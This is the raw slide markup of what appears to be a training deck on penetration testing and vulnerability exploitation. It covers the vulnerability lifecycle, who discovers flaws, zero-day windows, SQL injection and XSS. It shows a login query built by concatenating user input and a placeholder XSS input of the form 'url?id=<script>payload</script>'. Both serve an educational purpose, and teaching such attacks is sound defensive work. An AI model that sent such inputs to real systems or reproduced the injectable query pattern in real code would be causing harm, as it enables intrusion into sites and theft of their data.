      <dsp:spPr>
        <a:xfrm>
          <a:off x="445457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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="464133" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1891829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140459"/>
                <a:satOff val="3249"/>
                <a:lumOff val="17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0459"/>
                <a:satOff val="3249"/>
                <a:lumOff val="17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AC6FEA-7520-4EC2-BBBC-746EC4E12C78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2332349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40459"/>
              <a:satOff val="3249"/>
              <a:lumOff val="173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Analysis and Verification</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2351025" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CC709BE-1E60-493D-8CA9-144586666C58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3778721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280919"/>
                <a:satOff val="6498"/>
                <a:lumOff val="346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80919"/>
                <a:satOff val="6498"/>
                <a:lumOff val="346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931127-ABD4-4DD2-B984-08D0D8CD79F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4219241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80919"/>
              <a:satOff val="6498"/>
              <a:lumOff val="346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Reporting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4237917" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F92447D1-0983-437A-961F-5D47637340EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5665613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421378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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1378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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C8E0A9-44B0-448F-BA09-3D3A3CD37C08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6106133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21378"/>
              <a:satOff val="9747"/>
              <a:lumOff val="51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Fixing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6124809" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{33A651F8-FC14-4BFE-9C72-CEF93A74B212}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7552505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561837"/>
                <a:satOff val="12996"/>
                <a:lumOff val="69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1837"/>
                <a:satOff val="12996"/>
                <a:lumOff val="69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571F17-C613-4440-9AE3-3B7CC47777EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7993024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1837"/>
              <a:satOff val="12996"/>
              <a:lumOff val="692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 Patch Release</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8011700" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77AAD59D-F5F8-439E-A30A-A77EE86298AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9439397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702297"/>
                <a:satOff val="16245"/>
                <a:lumOff val="86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02297"/>
                <a:satOff val="16245"/>
                <a:lumOff val="86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A69956-0F53-4D30-BEBA-9AEC5EF69A3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9879916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02297"/>
              <a:satOff val="16245"/>
              <a:lumOff val="86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Publicity and Notification</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9898592" y="1148202"/>
        <a:ext cx="1357626" cy="600300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="11326289" y="970113"/>
          <a:ext cx="1651948" cy="6376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842756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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2756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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87454-8007-4B52-B763-2E00EBDEE85D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="11766808" y="1129526"/>
          <a:ext cx="1394978" cy="637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42756"/>
              <a:satOff val="19494"/>
              <a:lumOff val="103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Post-Discovery Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11785484" y="1148202"/>
        <a:ext cx="1357626" cy="60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67451-F852-416D-B536-9AF2C3BEFFA0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2672" y="0"/>
          <a:ext cx="2570746" cy="31595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System Type</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2672" y="0"/>
        <a:ext cx="2570746" cy="947877"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C5DB53E-95D1-42B1-AA3C-6A1E4024C870}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="259747" y="948802"/>
          <a:ext cx="2056596" cy="952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Public</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="287649" y="976704"/>
        <a:ext cx="2000792" cy="896855"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6E889B6F-33F1-4FDA-95B1-A25C2B88830B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="259747" y="2048025"/>
          <a:ext cx="2056596" cy="952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Private</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="287649" y="2075927"/>
        <a:ext cx="2000792" cy="896855"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DF0B4F8-4B35-45E9-BCC7-C2DFC4E82F4B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2766224" y="0"/>
          <a:ext cx="2570746" cy="315958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Discover by</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2766224" y="0"/>
        <a:ext cx="2570746" cy="947877"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3027C50A-40FC-4FEB-B8A9-9DB283F47522}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023299" y="947954"/>
          <a:ext cx="2056596" cy="460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Hacker</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3036780" y="961435"/>
        <a:ext cx="2029634" cy="433322"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F633FE13-E954-482B-9409-8AE8B5800A60}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023299" y="1479052"/>
          <a:ext cx="2056596" cy="460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Researcher</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3036780" y="1492533"/>
        <a:ext cx="2029634" cy="433322"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{48E3FBAF-4C73-4F98-B92D-687663F466E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023299" y="2010150"/>
          <a:ext cx="2056596" cy="460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SRC</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3036780" y="2023631"/>
        <a:ext cx="2029634" cy="433322"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{57E9720B-0829-4B08-AC67-6151DD908588}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023299" y="2541248"/>
          <a:ext cx="2056596" cy="460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Internal</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3036780" y="2554729"/>
        <a:ext cx="2029634" cy="4333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61137-81B2-4ECE-AB25-522714A6B5C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="612" y="172105"/>
          <a:ext cx="1539518" cy="5942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41862D-8759-499E-BE04-DD513795BC59}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="411151" y="320669"/>
          <a:ext cx="1300038" cy="594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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428556" y="338074"/>
        <a:ext cx="1265228" cy="559444"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1759085" y="172105"/>
          <a:ext cx="1539518" cy="5942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421378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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1378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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AC6FEA-7520-4EC2-BBBC-746EC4E12C78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2169623" y="320669"/>
          <a:ext cx="1300038" cy="594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21378"/>
              <a:satOff val="9747"/>
              <a:lumOff val="51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Analysis and Verification</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2187028" y="338074"/>
        <a:ext cx="1265228" cy="559444"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3517557" y="172105"/>
          <a:ext cx="1539518" cy="59425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842756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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2756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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87454-8007-4B52-B763-2E00EBDEE85D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3928096" y="320669"/>
          <a:ext cx="1300038" cy="594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42756"/>
              <a:satOff val="19494"/>
              <a:lumOff val="1039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illegal </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1300" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C4043"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3945501" y="338074"/>
        <a:ext cx="1265228" cy="55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6ED622-7DB6-1647-BF67-06894C64E8A6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9E43F0-17D7-9042-B560-DDCF3897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918526-E670-A741-9DF2-9B9FD1F522BE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CFE407-59DA-4749-9C33-228AC5BC3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53110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6220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59331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12441" algn="l" defTabSz="653110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tl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45310"/>
            <a:ext cx="11904235" cy="1115167"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="DIN-Regul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1233485"/>
            <a:ext cx="10241280" cy="75748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+mj-lt"/>
                <a:cs typeface="DIN-Regular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LillyLogo_RGB_R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52" y="-207834"/>
            <a:ext cx="2506453" cy="17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B782-6511-884A-AB9E-820237990E9C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C817-4775-8E43-827A-9B6300E73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3A39-762E-4245-AD74-71E0617585FA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D066-61F3-914D-B5DE-FBF01628C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910C0-F0E4-3B4A-8D46-358441509B60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4A9EC-2F93-AA4A-8BF5-70DF0428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837207"/>
            <a:ext cx="1316736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36983"/>
            <a:ext cx="1316736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bg1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F3ED2-6F8D-7D45-AF10-D2D3556D9BFD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AF3C62-1A59-4F44-B82E-3DE82A2B4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1BE2A-2252-9444-B2E3-2D8A10A02AC2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8D63-065C-4A40-9406-8D88263CD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48B2-B8F3-2E45-81FA-5DB8CEAC2FA2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A610-1FD4-6D4F-A58A-4231F7E62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4B979-1B0D-3F40-B898-617F6316D246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091A-6171-8549-AB50-E9BC0BD2A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46B0-1CE3-E543-A2FD-586639F99AB1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17D4-C237-9C48-B055-D56E04DD8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4254-0CED-874B-8A90-5D858C792B29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1104-5DF5-5E4A-BF1A-3C62FCFA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42B60-F775-2640-9745-751F490B6292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9EF4F-DBF0-224B-B15F-8C5B2C581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porateSlides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94048"/>
            <a:ext cx="13167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781694"/>
            <a:ext cx="13167360" cy="54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D20A858-274F-B841-B8FA-9BAD68F13E53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accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="DIN-Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AA26E4DD-3705-C34F-BBF3-04369A652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653110" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="6300" kern="1200">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="DIN-Regular"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5pPr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5pPr>
      <a:lvl6pPr marL="653110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6pPr>
      <a:lvl7pPr marL="1306220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7pPr>
      <a:lvl8pPr marL="1959331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8pPr>
      <a:lvl9pPr marL="2612441" algn="l" defTabSz="653110" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="6300">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="489833" indent="-489833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DIN-Regular"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="1061304" indent="-408194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DIN-Regular"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="163277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DIN-Regular"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="228588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DIN-Regular"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2938996" indent="-326555" algn="l" defTabSz="65311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ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="DIN-Regular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A2CF91A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63" y="497058"/>
            <a:ext cx="11904235" cy="2161921"/>
          </a:xfrm>
        </p:spPr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Penetration test &amp;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Vulnerability Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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6386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0F82-85C6-EF4F-9F8B-17ABE23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Vulnerability lifecycle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E1C9FBA-DF08-CEDF-AC97-9083EFDC9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79530"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1003088" y="1465648"/>
          <a:ext cx="13166725" cy="273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C6A-A1AF-867C-2E09-FB16A6A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1836-5143-927A-6C13-EE22BB3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8A75-8895-E08C-9814-C3239CFB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B49293-62F1-F9C5-8993-59876934EB2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3610444" y="212854"/>
            <a:ext cx="414669" cy="3797597"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4679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BAB24-87C3-0FA2-B6CC-4CB4CBAFCD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419057" y="1521546"/>
            <a:ext cx="797442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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>day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5E575C5-ABA6-4F9E-DC7D-EC9E7FBAA357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9248356" y="-1476836"/>
            <a:ext cx="414669" cy="7176978"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4679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E009B-65C2-5A4F-1881-37F4723680BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504518" y="1534235"/>
            <a:ext cx="19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 day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D3E0CC4-6A15-FF85-E3C5-7F6BCD769946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7540058" y="1772961"/>
            <a:ext cx="414669" cy="3760383"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4679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456F0-76D3-0337-E211-D21CEEF230ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902546" y="3905176"/>
            <a:ext cx="19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Vuln. Windows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6120B-B73C-8159-F29C-7807607F3D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446278" y="1674963"/>
            <a:ext cx="108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altLang="zh-CN" dirty="0"/>
              <a:t>day </a:t>
            </a:r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78D706F-172C-E4FD-0430-77E72C90C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746477"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="527558" y="4202941"/>
          <a:ext cx="5339643" cy="315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C9EE5B07-16E0-5CF6-C5AF-BC8C50465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776802"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7586450" y="4784732"/>
          <a:ext cx="5228747" cy="108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A551187D-6C3F-686E-45AC-7035C724D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951936"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6197152" y="5743668"/>
          <a:ext cx="8253004" cy="1715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F2A27A0-3EAA-6891-7289-017F9325FC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6305009" y="4542604"/>
            <a:ext cx="235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Discover by Hacker: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1898E-B24B-8DA3-DE0E-4E615F3207AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988144" y="5818897"/>
            <a:ext cx="235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Discover Internal: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73488-B053-49BE-CF54-4256A381216C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63630" y="1482037"/>
            <a:ext cx="235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Discover by Researcher &amp; SRC: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771D-8711-8AE4-0EBD-7D5B0A1A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E701-2C95-E955-A34D-22A6C12C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781693"/>
            <a:ext cx="6985236" cy="5213835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>xx_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>xx_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = ‘?’;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BDE0-5979-D61E-4A54-4D66A94D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0DA9-C2F7-E114-2D67-D58ECDC2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CBAD-E6F5-2DE8-E2AE-C6EB046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FD1D16B-D128-E635-0624-7D802DCC9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16368"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7464056" y="2288746"/>
          <a:ext cx="6985236" cy="502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C2B7AE-BC55-B0A2-AC35-F8EFFA3A06D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="181108" y="1626781"/>
            <a:ext cx="6985236" cy="536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9833" indent="-489833" algn="l" defTabSz="65311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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="DIN-Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1061304" indent="-408194" algn="l" defTabSz="65311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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="DIN-Regular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1632776" indent="-326555" algn="l" defTabSz="65311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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="DIN-Regular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2285886" indent="-326555" algn="l" defTabSz="65311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DIN-Regular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2938996" indent="-326555" algn="l" defTabSz="65311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DIN-Regular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username, password FROM users WHERE username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>输入的用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>输入的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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00593B-A0BD-5949-2097-229E5146D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557427"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="329964" y="2288746"/>
          <a:ext cx="6985236" cy="5022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81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5C52-EECD-D36D-A04F-9C4FBE5F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- XSS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F52E-698F-DDF5-74A5-DB51F17D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511A-DD49-1969-091A-C95551C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A86-7270-DD0B-1F1A-DD949DE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85B0E-7128-2CC1-EA99-5432FA64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96" y="2375502"/>
            <a:ext cx="906738" cy="719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B4B50-E27F-3581-407A-9AED0F092D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533104" y="2905310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1EEED-1359-B101-7CF3-8E2FCF43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96" y="3835429"/>
            <a:ext cx="906738" cy="719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BB2D4-615A-A790-2D80-377ED0D1BA8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533104" y="4365237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A540D1-AD18-C0DA-79E6-C70D204C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650" y="2375502"/>
            <a:ext cx="906738" cy="719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A6971C-C11E-D9A3-BE57-6043553CF152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9189158" y="2905310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928CA3-68BC-23BB-2CC3-BE89295683ED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5757334" y="2735158"/>
            <a:ext cx="3749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BE37E-5EC6-3220-610B-EB92F1408DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5871249" y="2365826"/>
            <a:ext cx="36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url?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;script&gt;payload&lt;/script&gt;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C61C95-8098-027B-0605-2EE91DFC2C87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10413388" y="2735158"/>
            <a:ext cx="46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86AC6-B4D5-5173-23D5-5FE0C3EC445F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10875516" y="2421487"/>
            <a:ext cx="1337662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XSS-Web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127AAF6-E42D-C963-4B3B-7AB49A1A1A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8311250" y="41544"/>
            <a:ext cx="225813" cy="6240382"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2012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03DDF4-58D2-25EA-72F1-48F8E39C2C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326022" y="3138625"/>
